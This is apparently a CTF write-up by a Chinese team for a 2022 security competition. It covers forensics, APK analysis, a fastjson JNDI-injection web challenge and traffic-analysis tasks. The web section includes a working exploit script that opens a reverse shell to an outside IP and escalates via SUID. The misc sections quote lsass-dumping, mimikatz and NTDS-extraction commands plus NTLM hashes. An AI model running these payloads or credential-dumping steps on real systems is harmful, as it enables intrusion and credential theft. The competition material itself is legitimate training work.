WP - 蓝帽 - 初赛

770
比赛 CTF

战队——糖醋排骨

队员——Tutu、lgz、guangfa

取证

手机取证_1

盘古云导出后,发现

image-20220709082400869

flag

360x360

手机取证_2

image-20220709082853990

直接搜

flag

SF1142358694796

计算机取证1

image-20220711101447096

hashdump 后解 MD5 即可

image-20220711101458984

计算机取证2

pstree看进程

image-20220709085958546

flag

2192

计算机取证3

image-20220709094421573

使用取证大师找到密钥文件,好像找不到办公文件

发现一个ppt导出来看看,有密码,使用passwarekit解密

image-20220709100628489

flag

flag{b27867b66866866686866883bb43536}

计算机取证4

image-20220711101517988

在 G.E01 中发现 TrueCrypt 加密文件

image-20220711101533305

用取证大师内存工具在 dmp 文件中找到 truecrypt 密钥,进行解密

image-20220711101552477

image-20220711101600447

在其中发现一个加密的压缩包,导出后进行爆破,密码 991314,解压得到 flag

image-20220711101619966

image-20220711101629656

程序分析1

AndroidKiller 打开直接获取到包名 exec.azj.kny.d.c

程序分析2

AndroidKiller 打开直接获取到入口点 minmtta.hemjcbm.ahibyws.MainActivity

image-20220711101841034

程序分析3

反编译,在 MainActivity 中得到服务器地址 base64 密文

image-20220711102151470

程序分析4

发现 MainActivity 调用了 d.a.a.h,进入即可发现安全检测判断函数为 d.a.a.c.a.a(),故 flag 为 a

image-20220711102209820

网站取证1

题目问寻找木马,搜

image-20220709133341613

lanmaobei666

网站取证2

image-20220709134110046

跟进

image-20220709134127634

<?php
function my_encrypt(){
    $str = 'P3LMJ4uCbkFJ/RarywrCvA==';
    $str = str_replace(array("/r/n", "/r", "/n"), "", $str);
    $key = 'PanGuShi';
    $iv = substr(sha1($key),0,16);
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
    mcrypt_generic_init($td, "PanGuShi", $iv);
    $decode = base64_decode($str);
    $dencrypted = mdecrypt_generic($td, $decode);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    $dencrypted = trim($dencrypted);
    echo $dencrypted;
    return $dencrypted;
}
my_encrypt();

跑,得到字符串KBLT123

flag

KBLT123

网站取证3

image-20220709135508557

跟进

image-20220709135544877

flag

jyzg123456

网站取证4

数据库搭起来

image-20220709143549326

把张宝 3 给王子豪 5 的钱和时间导出 order.txt,将钱和时间提取出来

f = open("order.txt","r").readlines()
m = open("m.txt","w")
t = open("t.txt","w")


for i in range(len(f)):
    if f[i].strip().split()[-3] == '5,' and f[i].strip().split()[-2] == '3,':
        if 2<=int(f[i].strip().split()[-5][-2:])<19:
            t.write(f[i].strip().split()[-5][-2:]+"\n")
            m.write(f[i].strip().split()[-1][1:-3]+"\n")

m.close()

计算

from hashlib import md5
import base64

key = md5(b'jyzg123456').hexdigest()
x = 0
char = ""
for i in range(6):
    if x == 6:
        x = 0
    char += key[x]
    x += 1
#char = 'cd9d86'
transfer_price = [0.04,0.06,0.05,0.07,0.10,0.15,0.17,0.23,
            0.22,0.25,0.29,0.20,0.28,0.33,0.35,0.35,0.37]

f = open("m.txt","r").readlines()
ff = open("t.txt","r").readlines()

sum = 0
t = 0
while t < 149:
    i = f[t]
    ii = ff[t]
##    print(ii)
    s = base64.b64decode(i.strip("\n"))
    data = ""
    for j in range(6):
        if s[j]>ord(char[j]):
            data += chr(s[j]-ord(char[j]))
        else:
            data += chr(s[j]-ord(char[j])+256)
##    print(data)
    t+=1
    sum += float(data)*transfer_price[int(ii)-2]

print(sum)

image-20220711102313130

web

Ez_gadget

1.2.62的fastjson,关键代码

  @ResponseBody
  @RequestMapping({"/json"})
  public String Unserjson(@RequestParam String str, @RequestParam String input) throws Exception {
    if (str != null && 
      Objects.hashCode(str) == secret.getKey().hashCode() && !secret.getKey().equals(str)) {
      String pattern = ".*rmi.*|.*jndi.*|.*ldap.*|.*\\\\x.*";
      Pattern p = Pattern.compile(pattern, 2);
      boolean StrMatch = p.matcher(input).matches();
      if (StrMatch)
        return "Hacker get out!!!"; 
      ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
      JSON.parseObject(input);
    } 
    return "hello";
  }

爆破一个合适的str

public class fun{
    public static void main(String[] args){
        String key ="tgVmFB4iKr7ElclK";
        for(long i=0; i<1000000000000L;i++){
            if(Long.toHexString(i).hashCode()==key.hashCode())
                System.out.println(Long.toHexString(i));
        }
    }
}

image-20220709112932180

直接jndi注入加了过滤

?str=132e8d2c8&input=%7B%22%40type%22%3A%22org.apache.xbean.propertyeditor.JndiConverter%22%2C%22AsText%22%3A%22ldap%3A%2F%2F39.102.128.224%3A1389%2Fvgujix%22%7D

image-20220709115706429

绕过使用n

import requests

url="http://eci-2ze4ml85yqv2cxmjftag.cloudeci1.ichunqiu.com:8888/json?str=132e8d2c8&input="

payload=u'{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"\nldap://39.102.128.224:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC8zOS4xMDIuMTI4LjIyNC85OTk3ICAwPiYx"}'

res = requests.get(url+payload)
print(res.text)

服务器监听那边连上了,不过发现/root这权限不够。

image-20220709123954695

find / -user root -perm -4000 -print 2>/dev/null查看suid权限

image-20220709124253839

使用date读flag

image-20220709124329548

flag

flag{6bc5ad16-290c-462f-88c5-1f7f6b2d4f31}

misc

domainhacker

流量包不大,可以逐条看,先读 1.php 发现执行的指令在变量 q8fb9d4c082c11 里,删掉前两个字符 base64 解码即可

cd /d "C:/phpstudy_pro/WWW"&whoami /priv&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "C:\\phpstudy_pro\\WWW"&powershell -c "whoami /priv"&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "C:\\phpstudy_pro\\WWW"&tasklist&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "C:\\phpstudy_pro\\WWW"&powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 476 C:\windows\temp\lsass.dmp full"&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "C:\\phpstudy_pro\\WWW"&cd c:\windows\temp\&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&dir&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&dir&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&move 1.rar c:\phpstudy_pro\www\&echo efa923ba504&cd&echo 1a4be8815ef8

攻击者用 comsvcs 转储 lsass,拿 mimikatz 读出 hash 打包到了压缩包 1.rar 里,密码为 SecretsPassw0rds,在最后一条流量里提取出 1.rar 解压缩,NTLM 项即为 flag

domainhacker2

和 domainhacker1 思路相同,在 1.php 执行的命令中找到压缩包密码为 FakePassword123$,解压后得到 ntds 文件和对应的 system,security 文件

cd /d "C:\\phpstudy_pro\\WWW"&dsquery computer&echo 1d3632&cd&echo 78bc462ab
cd /d "C:\\phpstudy_pro\\WWW"&hostname&echo 1d3632&cd&echo 78bc462ab
C:/phpstudy_pro/WWW/log.txt
C:/phpstudy_pro/WWW/
C:/phpstudy_pro/WWW/log.txt
C:/phpstudy_pro/WWW/log.txt
ac i ntds
ifm
create full c:\windows\temp\new
q
q
C:/phpstudy_pro/WWW/
cd /d "C:\\phpstudy_pro\\WWW"&cmd.exe /c ntdsutil.exe < log.txt >err.txt 2>&1&echo 1d3632&cd&echo 78bc462ab
cd /d "C:\\phpstudy_pro\\WWW"&dir &echo 1d3632&cd&echo 78bc462ab
cd /d "C:\\phpstudy_pro\\WWW"&type err.txt&echo 1d3632&cd&echo 78bc462ab
cd /d "C:\\phpstudy_pro\\WWW"&cd c:\windows\temp\&echo 1d3632&cd&echo 78bc462ab
cd /d "c:\\Windows\\Temp"&dir&echo 1d3632&cd&echo 78bc462ab
C:/windows/temp/Rar.exe
cd /d "c:\\Windows\\Temp"&rar.exe a -PFakePassword123$ ntds.rar new&echo 1d3632&cd&echo 78bc462ab
cd /d "c:\\Windows\\Temp"&dir&echo 1d3632&cd&echo 78bc462ab
cd /d "c:\\Windows\\Temp"&move ntds.rar c:\phpstudy_pro\www\&echo 1d3632&cd&echo 78bc462ab

使用 secretsdump 工具提取历史密码 hash

python .\secretsdump.py -ntds ntds.dit -security security -system system -history local

得到 Administrator 的密码 hash

test.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a85016dddda9fe5a980272af8f54f20e:::
test.local\Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:07ab403ab740c1540c378b0f5aaa4087:::
test.local\Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::
test.local\Administrator_history2:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::

history0 即为 flag

本文链接:

https://littlewhite.fun/index.php/498.html
1 + 7 =
1 评论
    %27%2Balert%281%29%2B%27Chrome 103Windows 10
    2022年08月02日 回复

    hacked by whoami